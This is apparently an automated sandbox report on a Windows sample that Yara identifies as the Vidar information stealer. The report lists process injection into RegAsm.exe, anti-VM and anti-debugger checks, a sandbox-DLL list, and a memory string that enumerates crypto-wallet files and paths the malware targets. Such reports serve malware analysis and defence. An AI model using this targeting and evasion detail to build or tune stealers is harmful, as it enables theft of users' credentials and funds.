Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00418970 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_00418970

Source: softokn3.dll.4.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.4.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.4.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.4.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.4.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.4.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.4.dr	Static PE information: section name: .didat
Source: sqln[1].dll.4.dr	Static PE information: section name: .00cfg
Source: nss3.dll.4.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.4.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008D65C2 push ecx; ret	0_2_008D65D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091ACED push ecx; ret	0_2_0091AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041A8B5 push ecx; ret	4_2_0041A8C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A61BF9 push ecx; ret	4_2_19C04C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A610C8 push ecx; ret	4_2_19C63552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\HCFBAFIDAECA\vcruntime140.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

4_2_00418970

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7344, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe, RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\HCFBAFIDAECA\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\HCFBAFIDAECA\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\HCFBAFIDAECA\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\HCFBAFIDAECA\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_004103D0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410502h

4_2_004103D0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E9C1F FindFirstFileExW,	0_2_008E9C1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	4_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	4_2_00416740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	4_2_00417800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	4_2_00416F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	4_2_004173C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040AAE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

4_2_00416BB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_004105A0 GetSystemInfo,wsprintfA,

4_2_004105A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: RegAsm.exe, 00000004.00000002.2202047159.000000000130B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000004.00000002.2202047159.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000004.00000002.2202047159.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_4-79741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_4-80844

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008DADD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_008DADD3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

4_2_00418970

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E650C mov eax, dword ptr fs:[00000030h]	0_2_008E650C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E6550 mov eax, dword ptr fs:[00000030h]	0_2_008E6550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E13E3 mov ecx, dword ptr fs:[00000030h]	0_2_008E13E3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008ED368 GetProcessHeap,

0_2_008ED368

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008D6D89 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008D6D89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008DADD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008DADD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008D7093 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008D7093
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008D71EF SetUnhandledExceptionFilter,	0_2_008D71EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041AA5F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0041AA5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041FB38 SetUnhandledExceptionFilter,	4_2_0041FB38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041BF87 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0041BF87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A62C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_19A62C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_19A642AF SetUnhandledExceptionFilter,	4_2_19A642AF

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00411C50 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

4_2_00411C50

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 424000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 644000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F7C008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008D6B7C cpuid

0_2_008D6B7C

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_008E624C
Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_008EC7A2
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_008ECA8F
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_008ECA44
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_008ECBB5
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_008ECB2A
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_008ECE08
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_008ECF31
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_008ED037
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_008ED106
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_008E5CE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	4_2_004103D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,LocalFree,	4_2_00410449
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	4_2_19A62112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	4_2_19A62112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	4_2_19C3FF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_19C53300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_19A63AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	4_2_19C52DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	4_2_19C52D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	4_2_19C52CB6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008D6F86 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_008D6F86

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00410280 GetProcessHeap,HeapAlloc,GetUserNameA,

4_2_00410280

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00410360 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

4_2_00410360

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000004.00000002.2202047159.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: er\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.901038.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.901038.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7344, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session 